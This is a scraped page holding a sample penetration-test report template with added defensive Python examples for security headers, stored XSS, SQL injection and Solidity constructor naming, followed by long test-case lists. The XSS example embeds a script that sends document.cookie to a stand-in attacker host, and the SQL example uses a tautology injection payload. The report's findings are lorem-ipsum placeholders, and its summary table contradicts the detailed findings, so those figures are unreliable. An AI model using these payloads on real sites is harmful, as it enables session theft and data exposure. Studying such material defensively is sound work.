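    if region not in ALLOWED_REGIONS:
        return f"activity in unmonitored region {region}"
    if name == "UpdateTrail":
        if params.get("enableLogFileValidation") is False:
            return "log file validation disabled (CloudTrail)"
        return None
    if name in ("CreateAccessKey", "UpdateLoginProfile"):
        target = params.get("userName")
        if target and target != actor(event):
            return f"{name} for another user ({target})"
        return None  # assumed benign: a user rotating their own credentials
    return SUSPICIOUS_EVENTS.get(name)


def triage(records):
    """Keep only the suspicious records, with who did it and why it was flagged."""
    hits = []
    for event in records:
        reason = classify(event)
        if reason:
            hits.append({"eventName": event.get("eventName"), "actor": actor(event), "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in triage(parse_records(SAMPLE_LOG)):
        print(hit)
```

The region rule is deliberately evaluated first: a StopLogging call in a region nobody monitors is the combination item 33 describes, and an attacker who has already disabled the trail in that region will not produce the later events at all, so the detection has to be anchored on an organisation-wide trail that the workload roles cannot modify.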
3.8 Test Cases for Blockchain
1. Test for Function Default Visibility
2. Test for Unencrypted Private Data On-Chain
3. Test for Code With No Effects
4. Test for Message Call with Hardcoded Gas Amount
5. Test for Unexpected Ether Balance
6. Test for Hash Collisions With Multiple Variable Length Arguments
7. Test for Presence of Unused Variables
8. Test for Right-To-Left-Override Control Character (U+202E)
9. Test for Typographical Error
10. Test for DoS With Block Gas Limit
11. Test for Arbitrary Jump with Function Type Variable
12. Test for Insufficient Gas Griefing
13. Test for Incorrect Inheritance Order
14. Test for Write to Arbitrary Storage Location
15. Test for Requirement Violation
16. Test for Lack of Proper Signature Verification
17. Test for Missing Protection against Signature Replay Attacks
18. Test for Weak Sources of Randomness from Chain Attributes
19. Test for Shadowing State Variables
20. Test for Incorrect Constructor Name
21. Test for Signature Malleability
22. Test for Block Values as a Proxy for Time
23. Test for Authorization through tx.origin
24. Test for Transaction Order Dependence
25. Test for DoS with Failed Call
26. Test for Delegatecall to Untrusted Callee
27. Test for Use of Deprecated Solidity Functions
28. Test for Assert Violation
29. Test for Uninitialized Storage Pointer
30. Test for State Variable Default Visibility
31. Test for Reentrancy
32. Test for Unprotected SELFDESTRUCT Instruction
33. Test for Unprotected Ether Withdrawal
34. Test for Unchecked Call Return Value
35. Test for Floating Pragma
36. Test for Outdated Compiler Version
37. Test for Integer Overflow and Underflow
Your plug & play cyber security suite.
Questions? Contact us at
hello@getastra.com

More Related Content

PDF
SecDevOps for API Security
PPTX
Securing the Web @RivieraDev2016
PDF
OWASP Top 10 Overview
PPTX
owasp features in secure coding techniques
PDF
OWASP Top 10
PDF
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
PPTX
Security guidelines
PPTX
Owasp top 10 vulnerabilities
SecDevOps for API Security
Securing the Web @RivieraDev2016
OWASP Top 10 Overview
owasp features in secure coding techniques
OWASP Top 10
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Security guidelines
Owasp top 10 vulnerabilities

Similar to Astra-Security-Sample-VAPT-Report leadind auditt.pdf (20)

PPTX
You are not excused! How to avoid security blind spots on the way to production
PPTX
OWASP Top 10 - 2017 Top 10 web application security risks
PDF
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
PDF
Webinar | Cybersecurity vulnerabilities of your business - Berezha Security G...
PPTX
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
PDF
apidays Australia 2023 - API Security Breach Analysis & Empowering Devs to M...
PDF
The API Primer (OWASP AppSec Europe, May 2015)
PDF
OWASP Top 10 2017
PDF
apidays New York 2023 - A decade of API breaches, courtesy of application fla...
PPTX
Web app security essentials
PDF
Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities
PPTX
Application-security-Javascript.pptx
PDF
C01461422
PDF
Security Awareness
PDF
2022 Vulnerability Statistics Report.pdf
PDF
Edgescan 2022 Vulnerability Statistics Report
PDF
API Vulnerabilties and What to Do About Them
PDF
Webinar–OWASP Top 10 for JavaScript for Developers
PPTX
Secure Coding: SSL, SOAP, and REST
PPTX
DevBeat 2013 - Developer-first Security
You are not excused! How to avoid security blind spots on the way to production
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
Webinar | Cybersecurity vulnerabilities of your business - Berezha Security G...
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
apidays Australia 2023 - API Security Breach Analysis & Empowering Devs to M...
The API Primer (OWASP AppSec Europe, May 2015)
OWASP Top 10 2017
apidays New York 2023 - A decade of API breaches, courtesy of application fla...
Web app security essentials
Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities
Application-security-Javascript.pptx
C01461422
Security Awareness
2022 Vulnerability Statistics Report.pdf
Edgescan 2022 Vulnerability Statistics Report
API Vulnerabilties and What to Do About Them
Webinar–OWASP Top 10 for JavaScript for Developers
Secure Coding: SSL, SOAP, and REST
DevBeat 2013 - Developer-first Security
Ad

Recently uploaded (20)

PDF
Java Basics-Introduction and program control
PPTX
ASME PCC-02 TRAINING -DESKTOP-NLE5HNP.pptx
PPTX
Management Information system : MIS-e-Business Systems.pptx
PPTX
mechattonicsand iotwith sensor and actuator
PPTX
"Array and Linked List in Data Structures with Types, Operations, Implementat...
PPTX
Building constraction Conveyance of water.pptx
PDF
Artificial Superintelligence (ASI) Alliance Vision Paper.pdf
PDF
Prof. Dr. KAYIHURA A. SILAS MUNYANEZA, PhD..pdf
PPTX
Chemical Technological Processes, Feasibility Study and Chemical Process Indu...
PDF
MLpara ingenieira CIVIL, meca Y AMBIENTAL
PPTX
Module 8- Technological and Communication Skills.pptx
PDF
UEFA_Embodied_Carbon_Emissions_Football_Infrastructure.pdf
PDF
Computer System Architecture 3rd Edition-M Morris Mano.pdf
PPTX
Feature types and data preprocessing steps
PPTX
Chapter 2 -Technology and Enginerring Materials + Composites.pptx
PDF
20250617 - IR - Global Guide for HR - 51 pages.pdf
PDF
Accra-Kumasi Expressway - Prefeasibility Report Volume 1 of 7.11.2018.pdf
PDF
Exploratory_Data_Analysis_Fundamentals.pdf
PDF
Unit I -OPERATING SYSTEMS_SRM_KATTANKULATHUR.pptx.pdf
PDF
Applications of Equal_Area_Criterion.pdf
Java Basics-Introduction and program control
ASME PCC-02 TRAINING -DESKTOP-NLE5HNP.pptx
Management Information system : MIS-e-Business Systems.pptx
mechattonicsand iotwith sensor and actuator
"Array and Linked List in Data Structures with Types, Operations, Implementat...
Building constraction Conveyance of water.pptx
Artificial Superintelligence (ASI) Alliance Vision Paper.pdf
Prof. Dr. KAYIHURA A. SILAS MUNYANEZA, PhD..pdf
Chemical Technological Processes, Feasibility Study and Chemical Process Indu...
MLpara ingenieira CIVIL, meca Y AMBIENTAL
Module 8- Technological and Communication Skills.pptx
UEFA_Embodied_Carbon_Emissions_Football_Infrastructure.pdf
Computer System Architecture 3rd Edition-M Morris Mano.pdf
Feature types and data preprocessing steps
Chapter 2 -Technology and Enginerring Materials + Composites.pptx
20250617 - IR - Global Guide for HR - 51 pages.pdf
Accra-Kumasi Expressway - Prefeasibility Report Volume 1 of 7.11.2018.pdf
Exploratory_Data_Analysis_Fundamentals.pdf
Unit I -OPERATING SYSTEMS_SRM_KATTANKULATHUR.pptx.pdf
Applications of Equal_Area_Criterion.pdf
Ad

Astra-Security-Sample-VAPT-Report leadind auditt.pdf

  • 1. SECURITY AUDIT REPORT FOR www.getastra.com Confidential MY BUSINESS ATTENTION: This document contains information from Astra IT, Inc. & Czar Securities Pvt. Ltd. that is confidential and privileged. The information is intended for private use of the client. By accepting this document you agree to keep the contents in confidence and not copy, disclose, or distribute this without written request to and written confirmation from Astra IT, Inc. & Czar Securities Pvt. Ltd. If you are not the intended recipient, be aware that any disclosure, copying, or distribution of the contents of this document is prohibited. April 05, 2021 COPYRIGHT © ASTRA IT, INC. All rights reserved. hello@getastra.com
  • 2. Document Details Confidential Title Details COMPLETED ON: REPORT TYPE: VALIDITY: APRIL 02, 2021 MANUAL SCAN 30 DAYS
  • 3. Table of Contents 1. Executive Summary 1.1 Scope of Testing 1.2 Graphical Summary 1.3 List of Vulnerabilities 2. Discovered Vulnerabilities Details 3. List of Tests Performed 3.1 OWASP Top 10 3.2 SANS 25 Software Errors/Tests 3.3 Other Test Cases 3.4 Server-Level Test Cases 3.5 Test Cases for Windows 3.6 Test Cases for Android / iOS 3.7 Test Cases for Cloud (AWS, Azure, GCP, and Other) 3.8 Test Cases for Blockchain Confidential 2
  • 4. 1. Executive Summary This document contains the initial security assessment report for : {Goldcast Web application and its backend dashboards.} The purpose of this assessment was to point out security loopholes, business logic errors, and missing best security practices. The tests were carried out assuming the identity of an attacker or a malicious user but no harm was made to the functionality or working of the application/network. Security assessment includes testing for security loopholes in the scope defined below. Apart from the following, no other information was provided. Nothing was assumed at the start of the security assessment. The following was the scope covered under the security audit: 1.1 Scope of Testing Application 1: {URL1} Application 2: {URL2} Confidential 3 The below graphical representations from Astra's VAPT dashboard will provide you an overall summary of the security audit scan results, including, vulnerabilities discovered, severity, respective CVSS Score, and other vulnerability details such as its impact, detailed PoC, steps to reproduce, affected URLs/network parameters, and recommended fixes. 1.2 Graphical Summary Graph 1: Issues Type Graph 2: Severity Type
Vulnerability Severity: No. of Vulnerabilities found
Critical: 0
High: 1
Medium: 2
Low: 4
Recommendations: 0

1.3 List of Vulnerabilities

#   Vulnerability                          Severity   Status   CVSS Score
1   Voluptas voluptates ipsa eos natus.    Low        Closed   6
2   Voluptas voluptates ipsa eos natus.    Medium     Closed   7
3   Voluptas voluptates ipsa eos natus.    Low        Closed   5
4   Voluptas voluptates ipsa eos natus.    High       Closed   9
5   Voluptas voluptates ipsa eos natus.    Low        Closed   6
6   Voluptas voluptates ipsa eos natus.    Medium     Closed   7
7   Voluptas voluptates ipsa eos natus.    Low        Closed   5
2. Discovered Vulnerabilities Details

Vulnerability #1: Missing API Security Headers
CVSS Score: 5.4
Severity: Medium
Status: Unsolved
Affected URL: Sitewide

Details of Vulnerability:
We were able to detect that the following security headers are missing from the API responses:
1. Content-Security-Policy
2. Strict-Transport-Security
3. X-Content-Type-Options

Impact:
A Content Security Policy (CSP) is a W3C standard aimed at preventing a broad range of content-injection attacks such as cross-site scripting (XSS) and data injection. It is a declarative policy that tells the user agent which sources are valid for loading resources (scripts, styles, images, frames and so on); anything outside the policy is blocked even if an attacker manages to inject it.
A missing X-Content-Type-Options header means browsers may MIME-sniff responses and interpret them as a content type other than the one declared, which exposes the site to MIME-sniffing attacks (for example, a user-supplied file served as text being executed as script).
A missing Strict-Transport-Security header means the application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption and use the application as a platform for attacks against its users.

Additional References:
https://www.example.com/reference
https://test.com/reference

Suggested Fixes:
Send these headers on every response, including API and error responses: a restrictive Content-Security-Policy (for a JSON-only API, default-src 'none' together with frame-ancestors 'none' is a safe baseline), Strict-Transport-Security with a max-age of at least one year and includeSubDomains, and X-Content-Type-Options: nosniff. Note that browsers only honour Strict-Transport-Security when it arrives over HTTPS.
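As an added example (the editor's code, not the auditors' tooling or the audited application's), the following script parses a raw HTTP response head and audits it for the three headers this finding reports, applying the thresholds recommended above. The two responses are constructed for illustration; the one-year max-age threshold and the CSP directive checks are the editor's assumptions, not the report's.

```python
"""Audit an HTTP response for the three headers reported missing in Vulnerability #1.

Added example, not part of the original report. The raw responses are
constructed; the one-year HSTS max-age threshold is an assumption based on
common hardening guidance.
"""
import re

ONE_YEAR = 31536000  # seconds; assumed minimum acceptable HSTS max-age


def parse_response_head(raw: str) -> dict:
    """Parse the status line and headers of a raw HTTP response.

    Header names are folded to lower case because HTTP header names are
    case-insensitive; for duplicated names the last occurrence wins.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(headers: dict, https: bool = True) -> list:
    """Return human-readable findings; an empty list means every check passed."""
    findings = []

    csp = headers.get("content-security-policy")
    if csp is None:
        findings.append("Content-Security-Policy missing")
    else:
        directives = {}
        for part in csp.split(";"):
            tokens = part.split()
            if tokens:
                directives[tokens[0].lower()] = tokens[1:]
        # script-src falls back to default-src; neither may allow inline or wildcard script
        script = directives.get("script-src", directives.get("default-src", []))
        if not script:
            findings.append("Content-Security-Policy has no default-src or script-src")
        elif "'unsafe-inline'" in script or "*" in script:
            findings.append("Content-Security-Policy allows inline or wildcard script sources")

    hsts = headers.get("strict-transport-security")
    if hsts is None:
        findings.append("Strict-Transport-Security missing")
    else:
        if not https:
            # Browsers ignore HSTS on plain-HTTP responses, so the header is inert there
            findings.append("Strict-Transport-Security sent over HTTP is ignored by browsers")
        m = re.search(r"max-age\s*=\s*(\d+)", hsts, re.IGNORECASE)
        if m is None or int(m.group(1)) < ONE_YEAR:
            findings.append("Strict-Transport-Security max-age below one year")
        if "includesubdomains" not in hsts.lower():
            findings.append("Strict-Transport-Security lacks includeSubDomains")

    xcto = headers.get("x-content-type-options")
    if xcto is None or xcto.lower() != "nosniff":
        findings.append("X-Content-Type-Options missing or not 'nosniff'")

    return findings


def audit_raw(raw: str, https: bool = True) -> list:
    """Convenience wrapper: raw response text in, findings out."""
    return audit_headers(parse_response_head(raw), https)


# Constructed sample responses (not captured from any real host).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "Server: example\r\n"
    "\r\n"
    '{"ok":true}'
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "Content-Security-Policy: default-src 'none'; frame-ancestors 'none'\r\n"
    "Strict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "\r\n"
    '{"ok":true}'
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_raw(raw) or ["OK"])
```

The `https` flag matters for retesting: a correct Strict-Transport-Security value observed on an http:// response does not close this finding, because browsers discard it there; verify the header on the HTTPS origin and, if the site redirects from HTTP, on the final HTTPS response.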
Vulnerability #2: Stored Cross-Site Scripting (XSS)
CVSS Score: 7.7
Severity: High
Status: Resolved
Affected URLs:
http://example.com/test1n
https://example.com/test2

Details of Vulnerability:
A stored XSS vulnerability was found on the affected URLs. It allows an attacker to inject a script that the application stores. When a victim navigates to the affected page, the XSS payload is served as part of the page, so victims inadvertently execute the malicious script as soon as the page is viewed in a browser.

Impact:
The attacker-supplied code runs in the victim's browser with the victim's session and can perform a wide variety of actions, such as:
1. Stealing the victim's session token
2. Stealing login credentials
3. Stealing customer credit card information

Additional References:
https://www.example.com/reference
https://test.com/reference

Suggested Fixes:
Handle the input securely in both client-side and server-side code before it is stored permanently on the web server: validate it against the expected format on input, and encode it for the HTML context in which it is rendered (element text, attribute value, URL) at output time. The server-side encoding is the security control; client-side checks only improve usability and can be bypassed. A Content-Security-Policy that restricts script sources limits the impact of any XSS that slips through.
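As an added example (the editor's code, not the audited application's), the following shows the vulnerable rendering beside a hardened one that encodes each stored value for the context it lands in. The comment store, field names, payload and the attacker host `attacker.example` are constructed for illustration.

```python
"""Stored XSS: the vulnerable rendering beside a context-aware encoded one.

Added example by the editor, not code from the audited application. The
comment store stands in for the database; the author/body/homepage fields,
the payload and the attacker host are constructed for illustration.
"""
import html
from urllib.parse import urlsplit

_COMMENTS = []  # stand-in for the table the application persists comments to


def store_comment(author: str, body: str, homepage: str) -> None:
    """Store untrusted input verbatim; encoding happens at output, per context."""
    _COMMENTS.append({"author": author, "body": body, "homepage": homepage})


def render_vulnerable() -> str:
    """Concatenates stored input straight into the page: the stored XSS."""
    rows = []
    for c in _COMMENTS:
        rows.append(
            f'<div class="comment"><a href="{c["homepage"]}">{c["author"]}</a>: {c["body"]}</div>'
        )
    return "\n".join(rows)


def safe_url(url: str) -> str:
    """URL context: HTML escaping does not neutralise javascript:, so allow-list the scheme."""
    if urlsplit(url.strip()).scheme.lower() in ("http", "https"):
        return html.escape(url, quote=True)
    return "#"


def render_hardened() -> str:
    """Encode each value for the context it lands in: element text, attribute, URL."""
    rows = []
    for c in _COMMENTS:
        rows.append(
            '<div class="comment"><a href="{href}">{author}</a>: {body}</div>'.format(
                href=safe_url(c["homepage"]),
                author=html.escape(c["author"], quote=True),
                body=html.escape(c["body"], quote=True),
            )
        )
    return "\n".join(rows)


def has_live_script(markup: str) -> bool:
    """Crude check used by this example: does a raw <script> tag or javascript: href survive?"""
    low = markup.lower()
    return "<script" in low or 'href="javascript:' in low


# Constructed attacker input, modelled on the session-token theft listed under Impact.
store_comment(
    "mallory",
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    "javascript:alert(document.domain)",
)

if __name__ == "__main__":
    print("vulnerable executes script:", has_live_script(render_vulnerable()))
    print("hardened executes script:  ", has_live_script(render_hardened()))
    print(render_hardened())
```

The `homepage` field is the reason the fix says "per context": `html.escape` alone would leave `javascript:alert(document.domain)` intact inside an `href`, so URL-valued fields need a scheme allow-list in addition to attribute encoding.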
Vulnerability #3: SQL Injection
CVSS Score: 5
Severity: Medium
Status: Resolved
Affected URL: https://www.example.co/form7

Details of Vulnerability:
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which the input appears and interfere with the structure of the surrounding query.

Steps to reproduce:
The JSON parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSON parameter and a general error message was returned. Two single quotes were then submitted and the error message disappeared. This behaviour is consistent with the input being placed inside a quoted SQL string literal: a lone quote terminates the literal early and breaks the query, while two quotes form a valid escaped quote. Review the contents of the error message and the application's handling of other input to confirm whether a vulnerability is present.
HTTP Requests: /CRUX/UIDL/

Additional References:
https://www.example.com/reference
https://test.com/reference

Suggested Fixes:
The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, malformed data in the second step cannot interfere with the query structure. Review the documentation for your database and application platform to determine the appropriate APIs for parameterized queries. Note that placeholders only bind values: table and column names or sort directions built from user input cannot be parameterized and must be checked against an allow-list. Separately, return a generic error page rather than the database's error text, since that text is what makes the probe above work.
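As an added example (the editor's code, not the audited application's), the following replays the probe from the steps to reproduce, plus a tautology payload, against a string-built query and against the parameterized fix. It uses an in-memory SQLite table with constructed rows; the JSON field name `email` and the table layout are assumptions.

```python
"""SQL injection: the error-based probe from Vulnerability #3 and the parameterized fix.

Added example, not the audited application's code. Uses an in-memory SQLite
database with constructed rows; the JSON field name "email" is an assumption.
"""
import json
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway table with two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (email, role) VALUES (?, ?)",
        [("alice@example.com", "user"), ("admin@example.com", "admin")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, json_body: str):
    """Builds the query by string formatting, so the input can alter its structure.

    Returns (rows, error). The error is the database's own message, which is
    what the probe relies on: a lone ' breaks the string literal, '' is a valid
    escaped quote, so the error appears and then disappears.
    """
    email = json.loads(json_body)["email"]
    sql = f"SELECT id, email, role FROM users WHERE email = '{email}'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)


def lookup_parameterized(conn: sqlite3.Connection, json_body: str):
    """Query structure is fixed first; the value is bound as data, never parsed as SQL."""
    email = json.loads(json_body)["email"]
    rows = conn.execute(
        "SELECT id, email, role FROM users WHERE email = ?", (email,)
    ).fetchall()
    return rows, None


def probe(conn: sqlite3.Connection, lookup) -> dict:
    """Run the report's probe and a tautology payload through a lookup function."""
    results = {}
    for label, value in (
        ("single_quote", "'"),
        ("two_quotes", "''"),
        ("tautology", "' OR '1'='1"),
    ):
        rows, err = lookup(conn, json.dumps({"email": value}))
        results[label] = {"rows": len(rows), "error": err is not None}
    return results


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", probe(db, lookup_vulnerable))
    print("parameterized:", probe(db, lookup_parameterized))
```

Against the vulnerable function the single quote produces a database error, two quotes do not, and the tautology returns every row, including the admin account; against the parameterized function none of the three inputs raises an error or returns a row, because each is matched literally as an e-mail address.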
Vulnerability #4: Incorrect Constructor Name
CVSS Score: 6.3
Severity: Medium
Status: Unsolved
Affected URL: https://www.hacked.co

Details of Vulnerability:
Constructors are special functions that are called only once, during contract creation. They often perform critical, privileged actions such as setting the owner of the contract. Before Solidity version 0.4.22, the only way to define a constructor was to create a function with the same name as the contract containing it. A function meant to be the constructor becomes a normal, publicly callable function if its name does not exactly match the contract name (the comparison is case-sensitive). This leads to security issues in particular when smart contract code is reused under a different contract name but the name of the constructor function is not changed accordingly: anyone can then call the former constructor after deployment and, for example, make themselves the owner.

Steps to reproduce:

Additional References:
https://swcregistry.io/docs/SWC-118

Suggested Fixes:
Solidity version 0.4.22 introduced the constructor keyword, which makes constructor definitions unambiguous. Upgrade the contract to a recent version of the Solidity compiler and declare the constructor with the constructor keyword; remove or rename the misnamed function, since it remains an ordinary callable function after the upgrade. From Solidity 0.5.0 the contract-name style of constructor is no longer accepted, so the compiler itself rejects the old form.
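As an added example (the editor's code, not the auditors' tooling), the following static check scans Solidity source for the SWC-118 pattern: a contract without a constructor keyword that contains a function whose name resembles, but does not exactly match, the contract name, or that sets the owner outside a constructor. The sample contracts are constructed for illustration; the 0.8 similarity threshold and the `owner = msg.sender` heuristic are the editor's assumptions.

```python
"""Static check for SWC-118 (incorrect constructor name) in Solidity source.

Added example by the editor, not the auditors' tooling. The contracts below
are constructed to illustrate the pattern; the similarity threshold (0.8)
and the 'owner = msg.sender' heuristic are the editor's assumptions.
"""
import re
from difflib import SequenceMatcher

CONTRACT_RE = re.compile(r"\bcontract\s+(\w+)[^{]*\{")
FUNCTION_RE = re.compile(r"\bfunction\s+(\w+)\s*\([^{;]*\{")
CONSTRUCTOR_RE = re.compile(r"\bconstructor\s*\(")
OWNER_SET_RE = re.compile(r"\bowner\s*=\s*msg\.sender\b")


def _block(src: str, open_idx: int) -> str:
    """Return the text between the brace at open_idx and its matching close."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    raise ValueError("unbalanced braces")


def find_misnamed_constructors(source: str) -> list:
    """Return (contract, function, reason) for functions that look like lost constructors.

    Heuristic rules, not a parser:
    - contracts that use the constructor keyword are skipped;
    - a function whose name resembles the contract name but is not identical
      would have been the constructor under the pre-0.4.22 convention;
    - a function that sets owner = msg.sender outside a constructor is an
      initializer anyone can call.
    """
    findings = []
    for cm in CONTRACT_RE.finditer(source):
        cname = cm.group(1)
        body = _block(source, cm.end() - 1)
        if CONSTRUCTOR_RE.search(body):
            continue
        for fm in FUNCTION_RE.finditer(body):
            fname = fm.group(1)
            if fname == cname:
                continue  # exact match: the legacy constructor, run once at creation
            fbody = _block(body, fm.end() - 1)
            ratio = SequenceMatcher(None, fname.lower(), cname.lower()).ratio()
            if fname.lower() == cname.lower() or ratio >= 0.8:
                findings.append((cname, fname, "name resembles contract name but does not match"))
            elif OWNER_SET_RE.search(fbody):
                findings.append((cname, fname, "sets owner = msg.sender outside a constructor"))
    return findings


# Constructed sample: a renamed contract whose constructor kept its old name,
# a case mismatch, and a contract fixed with the constructor keyword.
SAMPLE = """
pragma solidity ^0.4.22;

contract Missing {
    address private owner;
    modifier onlyowner { require(msg.sender == owner); _; }
    function IamMissing() public { owner = msg.sender; }
    function withdraw() public onlyowner { msg.sender.transfer(this.balance); }
}

contract Wallet {
    address private owner;
    function wallet() public { owner = msg.sender; }
}

contract Fixed {
    address private owner;
    constructor() public { owner = msg.sender; }
}
"""

if __name__ == "__main__":
    for contract, func, reason in find_misnamed_constructors(SAMPLE):
        print(f"{contract}.{func}: {reason}")
```

In the constructed sample, `Missing.IamMissing` and `Wallet.wallet` are reported and `Fixed` is not. The check is a triage aid: a compiler upgrade (0.5.0 or later) gives a definitive answer, because it refuses the old constructor form outright.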
3. List of VAPT Tests Performed

The following lists of tests are indicative and not limited to the ones listed. Every test case has multiple sub-test cases, ranging from a few to sometimes 1000+ sub-tests. Additional test cases are performed depending on factors such as:
1. Technology stack
2. Server-side programming language and front-end frameworks
3. Framework/CMS/APIs
4. Type of application (payment integrations, external integrations)

3.1 OWASP Top 10

For Web Applications (OWASP Top 10, 2017 edition):
1. Injection (including SQL injection)
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging and Monitoring

For Mobile Applications (OWASP Mobile Top 10, 2016 edition):
1. Improper Platform Usage
2. Insecure Data Storage
3. Insecure Communication
4. Insecure Authentication
5. Insufficient Cryptography
6. Insecure Authorization
7. Client Code Quality
8. Code Tampering
9. Reverse Engineering
10. Extraneous Functionality
3.2 SANS 25 Software Errors/Tests

SANS 25 (CWE/SANS Top 25 Most Dangerous Software Errors, 2019 edition):
1. Improper Restriction of Operations within the Bounds of a Memory Buffer
2. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
3. Improper Input Validation
4. Information Exposure
5. Out-of-bounds Read
6. Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
7. Use After Free
8. Integer Overflow or Wraparound
9. Cross-Site Request Forgery (CSRF)
10. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
11. Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
12. Out-of-bounds Write
13. Improper Authentication
14. NULL Pointer Dereference
15. Incorrect Permission Assignment for Critical Resource
16. Unrestricted Upload of File with Dangerous Type
17. Improper Restriction of XML External Entity Reference
18. Improper Control of Generation of Code ('Code Injection')
19. Uncontrolled Resource Consumption
20. Missing Release of Resource after Effective Lifetime
21. Untrusted Search Path
22. Deserialization of Untrusted Data
23. Improper Certificate Validation
24. Use of Hard-coded Credentials
25. Improper Privilege Management
3.3 Other Test Cases

Other Tests (typical severity in brackets):
1. OS command injection (High)
2. SQL injection, second order (High)
3. XML external entity injection (High)
4. LDAP injection (High)
5. XPath injection (High)
6. XML injection (High)
7. ASP.NET debugging enabled (High)
8. DoS: locking customer accounts (High)
9. DoS: buffer overflows (Medium)
10. Storing too much data in session (DoS) (Medium)
11. Writing user-provided data to disk (DoS) (High)
12. HTTP insecure methods available on server (High)
13. Out-of-band resource load (HTTP) (High)
14. File path manipulation (High)
15. Server-side JavaScript code injection (High)
16. Perl code injection (High)
17. Ruby code injection (High)
18. Python code injection (High)
19. Expression Language injection (High)
20. Unidentified code injection (High)
21. Client-side SQL injection (stored DOM-based) (High)
22. Server-side template injection (High)
23. SSI injection (High)
24. Stored XSS (High)
25. HTTP response header injection (High)
26. Reflected XSS (High)
27. Client-side template injection (High)
28. DOM-based XSS (High)
29. Reflected DOM-based XSS (High)
30. Stored DOM-based XSS (High)
31. DOM-based JavaScript injection (High)
32. Reflected DOM-based JavaScript injection (High)
33. Stored DOM-based JavaScript injection (High)
34. Path-relative style sheet import (Information)
35. Client-side SQL injection (DOM-based) (High)
36. Client-side SQL injection (reflected DOM-based) (High)
37. WebSocket hijacking (DOM-based) (High)
38. WebSocket hijacking (reflected DOM-based) (High)
39. WebSocket hijacking (stored DOM-based) (High)
40. Local path manipulation (DOM-based) (High)
41. Local path manipulation (reflected DOM-based) (High)
42. Local path manipulation (stored DOM-based) (High)
43. Client-side XPath injection (DOM-based) (Low)
44. Client-side XPath injection (reflected DOM-based) (Low)
45. Client-side XPath injection (stored DOM-based) (Low)
46. Client-side JSON injection (DOM-based) (Low)
47. Client-side JSON injection (reflected DOM-based) (Low)
48. Client-side JSON injection (stored DOM-based) (Low)
49. Flash cross-domain policy (High)
50. Cross-origin resource sharing (Information)
51. Cross-origin resource sharing: arbitrary origin trusted (High)
52. Cross-origin resource sharing: unencrypted origin trusted (Low)
53. Cross-origin resource sharing: all subdomains trusted (Low)
54. Cross-site request forgery (CSRF) (Medium)
55. SMTP header injection (Medium)
56. Cleartext submission of password (High)
57. External service interaction (DNS) (High)
58. External service interaction (HTTP) (High)
59. External service interaction (SMTP) (Information)
60. Referer-dependent response (Information)
61. Spoofable client IP address (Information)
62. User-agent-dependent response (Information)
63. Password returned in a later response (Medium)
64. Password submitted using GET method (Low)
65. Password returned in URL query string (Low)
66. SQL statement in request parameter (Medium)
67. Cross-domain POST (Information)
68. ASP.NET ViewState without MAC enabled (Low)
69. XML entity expansion (Medium)
70. Long redirection response (Information)
71. Serialized object in HTTP message (High)
72. Duplicate cookies set (Information)
109. Link manipulation (DOM-based) (Low)
110. Input returned in response (stored) (Information)
111. Input returned in response (reflected) (Information)
112. Suspicious input transformation (reflected) (Information)
113. Suspicious input transformation (stored) (Information)
114. Open redirection (stored) (Low)
115. Open redirection (reflected) (Medium)
116. Open redirection (DOM-based) (Low)
117. Open redirection (stored DOM-based) (Low)
118. Open redirection (reflected DOM-based) (Medium)
119. SSL cookie without Secure flag set (Medium)
120. Cookie scoped to parent domain (Low)
121. Cross-domain Referer leakage (Information)
122. Cross-domain script include (Information)
123. Cookie without HttpOnly flag set (Low)
124. Session token in URL (Medium)
125. Password field with autocomplete enabled (Low)
126. Password value set in cookie (Medium)
127. Browser cross-site scripting filter disabled (Information)
128. HTTP TRACE method is enabled (Information)
129. Cookie manipulation (DOM-based) (Low)
